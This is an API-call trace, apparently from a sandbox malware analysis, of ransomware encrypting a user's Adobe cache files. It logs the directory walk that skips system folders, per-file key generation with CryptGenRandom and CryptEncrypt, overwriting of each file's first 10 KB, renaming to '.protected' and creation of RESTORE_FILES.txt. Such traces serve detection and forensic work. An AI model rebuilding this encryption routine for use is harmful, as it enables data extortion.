1 [0077.500] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.500] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.500] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.500] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.500] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.500] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\..") returned 50 [0077.500] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.500] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.500] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0077.500] lstrcmpiW (lpString1="Adobe", lpString2="Windows") returned -1 [0077.500] lstrcmpiW (lpString1="Adobe", lpString2="Program Files") returned -1 [0077.500] lstrcmpiW (lpString1="Adobe", lpString2="Program Files (x86)") returned -1 [0077.500] lstrcmpiW (lpString1="Adobe", lpString2="$Recycle.bin") returned 1 [0077.500] lstrcmpiW (lpString1="Adobe", lpString2="System Volume Information") returned -1 [0077.500] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe") returned 53 [0077.500] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0077.500] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0077.501] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*") returned 55 [0077.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0077.501] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.501] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.501] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.501] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.501] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.501] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\.") returned 55 [0077.501] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.501] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0077.501] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.501] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.501] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.501] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.501] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.501] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\..") returned 56 [0077.501] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.501] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.501] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0077.501] lstrcmpiW (lpString1="Acrobat", lpString2="Windows") returned -1 [0077.501] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files") returned -1 [0077.501] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files (x86)") returned -1 [0077.501] lstrcmpiW (lpString1="Acrobat", lpString2="$Recycle.bin") returned 1 [0077.501] lstrcmpiW (lpString1="Acrobat", lpString2="System Volume Information") returned -1 [0077.501] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat") returned 61 [0077.502] lstrcmpW (lpString1="Acrobat", lpString2=".") returned 1 [0077.502] lstrcmpW (lpString1="Acrobat", lpString2="..") returned 1 [0077.502] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*") returned 63 [0077.502] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0077.502] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.503] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.503] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.503] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.503] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.503] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\.") returned 63 [0077.503] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.503] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0077.503] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.503] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.503] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.503] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.503] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.503] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\..") returned 64 [0077.503] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.503] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.503] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0077.503] lstrcmpiW (lpString1="10.0", lpString2="Windows") returned -1 [0077.503] lstrcmpiW (lpString1="10.0", lpString2="Program Files") returned -1 [0077.503] lstrcmpiW (lpString1="10.0", lpString2="Program Files (x86)") returned -1 [0077.503] lstrcmpiW (lpString1="10.0", lpString2="$Recycle.bin") returned 1 [0077.503] lstrcmpiW (lpString1="10.0", lpString2="System Volume Information") returned -1 [0077.503] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0") returned 66 [0077.503] lstrcmpW (lpString1="10.0", lpString2=".") returned 1 [0077.503] lstrcmpW (lpString1="10.0", lpString2="..") returned 1 [0077.503] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*") returned 68 [0077.503] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0077.504] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.504] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.504] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.504] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.504] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.504] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\.") returned 68 [0077.504] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.505] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0077.505] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.505] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.505] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.505] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.505] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.505] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\..") returned 69 [0077.505] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.505] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.505] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0077.505] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="Windows") returned -1 [0077.505] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="Program Files") returned -1 [0077.505] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="Program Files (x86)") returned -1 [0077.505] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="$Recycle.bin") returned 1 [0077.505] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="System Volume Information") returned -1 [0077.505] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst") returned 85 [0077.505] StrStrIW (lpFirst="AdobeCMapFnt10.lst", lpSrch=".protected") returned 0x0 [0077.505] lstrcmpW (lpString1="AdobeCMapFnt10.lst", lpString2="RESTORE_FILES.txt") returned -1 [0077.505] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0077.505] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0077.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0077.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst") returned 85 [0077.506] StrStrW (lpFirst="AdobeCMapFnt10.lst", lpSrch=".txt") returned 0x0 [0077.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst") returned 85 [0077.506] StrStrW (lpFirst="AdobeCMapFnt10.lst", lpSrch=".rar") returned 0x0 [0077.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst") returned 85 [0077.506] StrStrW (lpFirst="AdobeCMapFnt10.lst", lpSrch=".zip") returned 0x0 [0077.506] ReadFile (in: hFile=0x150, lpBuffer=0x4a0460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a0460*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0077.512] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.512] WriteFile (in: hFile=0x150, lpBuffer=0x4a0460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a0460*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0077.512] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.512] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0077.519] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0077.519] CloseHandle (hObject=0x150) returned 1 [0077.519] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.protected") returned 95 [0077.519] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst.protected")) returned 1 [0077.520] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0077.520] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="Windows") returned -1 [0077.520] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="Program Files") returned -1 [0077.520] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="Program Files (x86)") returned -1 [0077.520] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="$Recycle.bin") returned 1 [0077.520] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="System Volume Information") returned -1 [0077.520] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst") returned 84 [0077.520] StrStrIW (lpFirst="AdobeSysFnt10.lst", lpSrch=".protected") returned 0x0 [0077.520] lstrcmpW (lpString1="AdobeSysFnt10.lst", lpString2="RESTORE_FILES.txt") returned -1 [0077.520] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0077.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0077.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0077.522] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst") returned 84 [0077.522] StrStrW (lpFirst="AdobeSysFnt10.lst", lpSrch=".txt") returned 0x0 [0077.522] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst") returned 84 [0077.522] StrStrW (lpFirst="AdobeSysFnt10.lst", lpSrch=".rar") returned 0x0 [0077.522] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst") returned 84 [0077.522] StrStrW (lpFirst="AdobeSysFnt10.lst", lpSrch=".zip") returned 0x0 [0077.522] ReadFile (in: hFile=0x150, lpBuffer=0x4a0460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a0460*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0077.558] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.558] WriteFile (in: hFile=0x150, lpBuffer=0x4a0460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a0460*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0077.558] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.558] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0077.581] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0077.581] CloseHandle (hObject=0x150) returned 1 [0077.593] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst.protected") returned 94 [0077.593] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst.protected")) returned 1 [0077.668] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0077.668] lstrcmpiW (lpString1="Cache", lpString2="Windows") returned -1 [0077.668] lstrcmpiW (lpString1="Cache", lpString2="Program Files") returned -1 [0077.668] lstrcmpiW (lpString1="Cache", lpString2="Program Files (x86)") returned -1 [0077.668] lstrcmpiW (lpString1="Cache", lpString2="$Recycle.bin") returned 1 [0077.668] lstrcmpiW (lpString1="Cache", lpString2="System Volume Information") returned -1 [0077.668] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache") returned 72 [0077.668] lstrcmpW (lpString1="Cache", lpString2=".") returned 1 [0077.668] lstrcmpW (lpString1="Cache", lpString2="..") returned 1 [0077.668] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\*") returned 74 [0077.668] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0077.668] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.668] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.668] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.668] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.668] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.668] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\.") returned 74 [0077.668] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.668] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0077.669] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.669] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.669] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.669] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.669] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.669] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\..") returned 75 [0077.669] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.669] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.669] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0077.669] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="Windows") returned -1 [0077.669] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="Program Files") returned -1 [0077.669] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="Program Files (x86)") returned -1 [0077.669] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="$Recycle.bin") returned 1 [0077.669] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="System Volume Information") returned -1 [0077.669] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst") returned 86 [0077.669] StrStrIW (lpFirst="AcroFnt10.lst", lpSrch=".protected") returned 0x0 [0077.669] lstrcmpW (lpString1="AcroFnt10.lst", lpString2="RESTORE_FILES.txt") returned -1 [0077.669] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0077.669] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0077.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0077.721] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst") returned 86 [0077.721] StrStrW (lpFirst="AcroFnt10.lst", lpSrch=".txt") returned 0x0 [0077.721] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst") returned 86 [0077.721] StrStrW (lpFirst="AcroFnt10.lst", lpSrch=".rar") returned 0x0 [0077.721] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst") returned 86 [0077.721] StrStrW (lpFirst="AcroFnt10.lst", lpSrch=".zip") returned 0x0 [0077.722] ReadFile (in: hFile=0x154, lpBuffer=0x4a1468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1468*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0077.762] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.762] WriteFile (in: hFile=0x154, lpBuffer=0x4a1468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1468*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0077.762] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.762] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0077.764] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0077.764] CloseHandle (hObject=0x154) returned 1 [0077.764] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst.protected") returned 96 [0077.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst.protected")) returned 1 [0077.765] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0077.765] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0077.765] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\RESTORE_FILES.txt") returned 90 [0077.765] CreateFileW 